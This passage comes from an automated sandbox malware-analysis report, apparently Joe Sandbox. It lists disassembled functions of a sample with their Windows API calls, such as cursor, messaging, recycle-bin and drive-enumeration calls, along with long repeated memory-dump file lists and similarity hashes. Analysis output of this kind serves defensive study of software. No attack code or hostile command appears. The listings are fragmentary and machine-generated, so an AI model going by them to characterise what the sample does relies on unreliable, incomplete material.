                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                                • Instruction ID: 1642b9dd75f3a4511d1f743995959062418e168b9dabd897861ea646df64c966
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44112AB5A00A00AFC324CF66C985D27BBE9EFC8714721C92EB59A87745D675FC40CB64
                                                                                                                                                                                                                                                                                                Function 0046D000 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                                • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                                • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                                Function 00467680 Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                                Function 00460400 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                                • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                                Function 0045D2A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction ID: 5dffe6ef64173943b566a41739161ce8ce63ae2a9ff69b85a90aeb8992a9e3ab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A17A71A043099FC324EF68C98096AB7F5FF89305F14892EE89687312D774F949CB5A
                                                                                                                                                                                                                                                                                                Function 0045D020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                                Function 0042B060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                                • String ID: C:\$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                                • Opcode ID: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                                • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                                Function 00456250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                • String ID: P
                                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                                • Opcode ID: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                                Function 00427220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
